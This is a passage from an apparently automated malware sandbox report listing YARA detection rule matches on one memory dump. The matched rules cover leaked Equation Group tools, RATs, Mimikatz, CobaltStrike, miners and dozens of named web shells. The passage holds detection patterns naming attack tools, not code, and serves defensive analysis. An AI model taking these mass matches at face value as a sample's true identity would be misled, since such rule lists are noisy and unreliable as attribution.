elgingamble, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_cmsd, Description: Equation Group hack tool leaked by ShadowBrokers- file cmsd, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_ebbshave, Description: Equation Group hack tool leaked by ShadowBrokers- file ebbshave.v5, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_eggbasket, Description: Equation Group hack tool leaked by ShadowBrokers- file eggbasket, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_sambal, Description: Equation Group hack tool leaked by ShadowBrokers- file sambal, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_cmsex, Description: Equation Group hack tool leaked by ShadowBrokers- file cmsex, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_DUL, Description: Equation Group hack tool leaked by ShadowBrokers- file DUL, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_slugger2, Description: Equation Group hack tool leaked by ShadowBrokers- file slugger2, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_jackpop, Description: Equation Group hack tool leaked by ShadowBrokers- file jackpop, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_epoxyresin_v1_0_0, Description: Equation Group hack tool leaked by ShadowBrokers- file epoxyresin.v1.0.0.1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_estesfox, Description: Equation Group hack tool leaked by ShadowBrokers- file estesfox, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup__ftshell_ftshell_v3_10_3_0, Description: Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup__scanner_scanner_v2_1_2, Description: Equation Group hack tool leaked by ShadowBrokers- from files scanner, scanner.v2.1.2, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup__ghost_sparc_ghost_x86_3, Description: Equation Group hack tool leaked by ShadowBrokers- from files ghost_sparc, ghost_x86, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup__jparsescan_parsescan_5, Description: Equation Group hack tool leaked by ShadowBrokers- from files jparsescan, parsescan, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup__ftshell, Description: Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_Toolset_Apr17_Eternalromance, Description: Detects EquationGroup Tool - April Leak, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_Toolset_Apr17_Gen2, Description: Detects EquationGroup Tool - April Leak, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_Toolset_Apr17__DoubleFeatureReader_DoubleFeatureReader_0, Description: Detects EquationGroup Tool - April Leak, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_Toolset_Apr17__EAFU_ecwi_ESKE_EVFR_RPC2_4, Description: Detects EquationGroup Tool - April Leak, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT6_Malware_Sample_Gen, Description: Rule written for 2 malware samples that communicated to APT6 C2 servers, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CryptoMiner, Description: Yara detected Crypto Miner, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RevengeRAT, Description: Yara detected RevengeRAT, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Mimikatz_1, Description: Yara detected Mimikatz, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebMonitor, Description: Yara detected WebMonitor RAT, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_ComRAT_XORKey, Description: Yara detected Turla ComRAT XORKey, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Nukesped, Description: Yara detected Nukesped, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_xtremerat_1, Description: Yara detected Xtreme RAT, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_PupyRAT, Description: Yara detected PupyRAT, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Mirai_6, Description: Yara detected Mirai, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Joe Security Rule: dragos_crashoverride_moduleStrings, Description: IEC-104 Interaction Module Program Strings, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Dragos Inc Rule: fe_cpe_ms17_010_ransomware, Description: probable petya ransomware using eternalblue, wmic, psexec, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick Rule: Anthem_DeepPanda_lot1, Description: Anthem Hack Deep Panda - lot1.tmp-pwdump, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Anthem_DeepPanda_htran_exe, Description: Anthem Hack Deep Panda - htran-exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: NetWiredRC_B, Description: NetWiredRC, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Jean-Philippe Teissier / @Jipe_ Rule: Backdoor_WebShell_asp, Description: Detect ASPXSpy, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: xylitol@temari.fr Rule: webshell_iMHaPFtp_2, Description: Web Shell - file iMHaPFtp.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_caidao_shell_guo, Description: Web Shell - file guo.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_PHP_redcod, Description: Web Shell - file redcod.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_php_sh_server, Description: Web Shell - file server.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_cihshell_fix, Description: Web Shell - file cihshell_fix.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_php_up, Description: Web Shell - file up.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_asp_EFSO_2, Description: Web Shell - file EFSO_2.asp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_jsp_up, Description: Web Shell - file up.jsp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_Server_Variables, Description: Web Shell - file Server Variables.asp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_caidao_shell_ice_2, Description: Web Shell - file ice.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_phpspy2010, Description: Web Shell - file phpspy2010.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_asp_ice, Description: Web Shell - file ice.asp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_asp_404, Description: Web Shell - file 404.asp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_webshell_cnseay02_1, Description: Web Shell - file webshell-cnseay02-1.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_php_fbi, Description: Web Shell - file fbi.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_B374kPHP_B374k, Description: Web Shell - file B374k.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_php_list, Description: Web Shell - file list.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_caidao_shell_404, Description: Web Shell - file 404.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_ASP_aspydrv, Description: Web Shell - file aspydrv.asp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_Dx_Dx, Description: Web Shell - file Dx.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_MySQL_Web_Interface_Version_0_8, Description: Web Shell - file MySQL Web Interface Version 0.8.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_phpkit_1_0_odd, Description: Web Shell - file odd.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_wsb_idc, Description: Web Shell - file idc.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_php_404, Description: Web Shell - file 404.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_webshell_cnseay_x, Description: Web Shell - file webshell-cnseay-x.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_asp_up, Description: Web Shell - file up.asp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_phpkit_0_1a_odd, Description: Web Shell - file odd.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_jsp_k81, Description: Web Shell - file k81.jsp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_jsp_cmdjsp, Description: Web Shell - file cmdjsp.jsp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_Java_Shell, Description: Web Shell - file Java Shell.jsp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_PHP_r57142, Description: Web Shell - file r57142.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_simple_backdoor, Description: Web Shell - file simple-backdoor.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_php_cmd, Description: Web Shell - file cmd.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_PHP_co, Description: Web Shell - file co.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_PHP_150, Description: Web Shell - file 150.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_PHP_c37, Description: Web Shell - file c37.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_PHP_b37, Description: Web Shell - file b37.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_PHP_bug_1_, Description: Web Shell - file bug (1).php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_ghost_source_icesword_silic, Description: Web Shell - from files ghost_source.php, icesword.php, silic.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_browser_201_3_400_in_JFolder_jfolder01_jsp_leo_ma_warn_webshell_nc_download, Description: Web Shell - from files browser.jsp, 201.jsp, 3.jsp, 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, ma.jsp, warn.jsp, webshell-nc.jsp, download.jsp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_Dive_Shell_1_0_Emperor_Hacking_Team_xxx, Description: Web Shell - from files Dive Shell 1.0 - Emperor Hacking Team.php, phpshell.php, SimShell 1.0 - Simorgh Security MGZ.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_jsp_reverse_jsp_reverse_jspbd, Description: Web Shell - from files jsp-reverse.jsp, jsp-reverse.jsp, jspbd.jsp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_gfs_sh_r57shell_r57shell127_SnIpEr_SA_xxx, Description: Web Shell - from files gfs_sh.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_itsec_PHPJackal_itsecteam_shell_jHn, Description: Web Shell - from files itsec.php, PHPJackal.php, itsecteam_shell.php, jHn.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_NIX_REMOTE_WEB_SHELL_NIX_REMOTE_WEB_xxx1, Description: Web Shell - from files NIX REMOTE WEB-SHELL.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, KAdot Universal Shell v0.1.6.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_2008_2009mssql_phpspy_2005_full_phpspy_2006_arabicspy_hkrkoz, Description: Web Shell - from files 2008.php, 2009mssql.php, phpspy_2005_full.php, phpspy_2006.php, arabicspy.php, hkrkoz.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_000_403_c5_config_myxx_queryDong_spyjsp2010_zend, Description: Web Shell - from files 000.jsp, 403.jsp, c5.jsp, config.jsp, myxx.jsp, queryDong.jsp, spyjsp2010.jsp, zend.jsp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat, Description: Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_000_403_807_a_c5_config_css_dm_he1p_xxx, Description: Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, config.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, myxx.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, u.jsp, xia.jsp, zend.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_PHPSPY, Description: Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, PHPSPY.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_c99_locus7s_c99_w4cking_xxx, Description: Web Shell - from files c99_locus7s.php, c99_w4cking.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, acid.php, newsh.php, r57.php, Backdoor.PHP.Agent.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_r57shell127_r57_kartal_r57, Description: Web Shell - from files r57shell127.php, r57_kartal.php, r57.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_webshells_new_con2, Description: Web shells - generated from file con2.asp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_Expdoor_com_ASP, Description: Web shells - generated from file Expdoor.com ASP.asp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_webshells_new_php2, Description: Web shells - generated from file php2.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_bypass_iisuser_p, Description: Web shells - generated from file bypass-iisuser-p.asp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_sig_404super, Description: Web shells - generated from file 404super.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_webshells_new_JSP, Description: Web shells - generated from file JSP.jsp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_webshell_123, Description: Web shells - generated from file webshell-123.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_dev_core, Description: Web shells - generated from file dev_core.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_webshells_new_pHp, Description: Web shells - generated from file pHp.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_webshells_new_pppp, Description: Web shells - generated from file pppp.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_webshells_new_code, Description: Web shells - generated from file code.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_webshells_new_xxxx, Description: Web shells - generated from file xxxx.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_webshells_new_PHP1, Description: Web shells - generated from file PHP1.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_webshells_new_asp1, Description: Web shells - generated from file asp1.asp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_webshells_new_php6, Description: Web shells - generated from file php6.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_GetPostpHp, Description: Web shells - generated from file GetPostpHp.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_webshells_new_php5, Description: Web shells - generated from file php5.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_webshells_new_PHP, Description: Web shells - generated from file PHP.php, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_webshells_new_Asp, Description: Web shells - generated from file Asp.asp, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: perlbot_pl, Description: Semi-Auto-generated - file perlbot.pl.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: php_backdoor_php, Description: Semi-Auto-generated - file php-backdoor.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php, Description: Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: shankar_php_php, Description: Semi-Auto-generated - file shankar.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Casus15_php_php, Description: Semi-Auto-generated - file Casus15.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: small_php_php, Description: Semi-Auto-generated - file small.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: shellbot_pl, Description: Semi-Auto-generated - file shellbot.pl.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: fuckphpshell_php, Description: Semi-Auto-generated - file fuckphpshell.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: ngh_php_php, Description: Semi-Auto-generated - file ngh.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: jsp_reverse_jsp, Description: Semi-Auto-generated - file jsp-reverse.jsp.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Tool_asp, Description: Semi-Auto-generated - file Tool.asp.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: NT_Addy_asp, Description: Semi-Auto-generated - file NT Addy.asp.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: SimAttacker___Vrsion_1_0_0___priv8_4_My_friend_php, Description: Semi-Auto-generated - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: phvayvv_php_php, Description: Semi-Auto-generated - file phvayvv.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: rst_sql_php_php, Description: Semi-Auto-generated - file rst_sql.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: wh_bindshell_py, Description: Semi-Auto-generated - file wh_bindshell.py.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: lurm_safemod_on_cgi, Description: Semi-Auto-generated - file lurm_safemod_on.cgi.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: c99madshell_v2_0_php_php, Description: Semi-Auto-generated - file c99madshell_v2.0.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: w3d_php_php, Description: Semi-Auto-generated - file w3d.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: WinX_Shell_html, Description: Semi-Auto-generated - file WinX Shell.html.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Dx_php_php, Description: Semi-Auto-generated - file Dx.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: csh_php_php, Description: Semi-Auto-generated - file csh.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: pHpINJ_php_php, Description: Semi-Auto-generated - file pHpINJ.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: sig_2008_php_php, Description: Semi-Auto-generated - file 2008.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: ak74shell_php_php, Description: Semi-Auto-generated - file ak74shell.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Rem_View_php_php, Description: Semi-Auto-generated - file Rem View.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Java_Shell_js, Description: Semi-Auto-generated - file Java Shell.js.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: STNC_php_php, Description: Semi-Auto-generated - file STNC.php.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: aZRaiLPhp_v1_0_php, Description: Semi-Auto-generated - file aZRaiLPhp v1.0.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: zacosmall_php, Description: Semi-Auto-generated - file zacosmall.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: CmdAsp_asp, Description: Semi-Auto-generated - file CmdAsp.asp.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: simple_backdoor_php, Description: Semi-Auto-generated - file simple-backdoor.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: mysql_shell_php, Description: Semi-Auto-generated - file mysql_shell.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Dive_Shell_1_0___Emperor_Hacking_Team_php, Description: Semi-Auto-generated - file Dive Shell 1.0 - Emperor Hacking Team.php.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Asmodeus_v0_1_pl, Description: Semi-Auto-generated - file Asmodeus v0.1.pl.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Reader_asp, Description: Semi-Auto-generated - file Reader.asp.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan 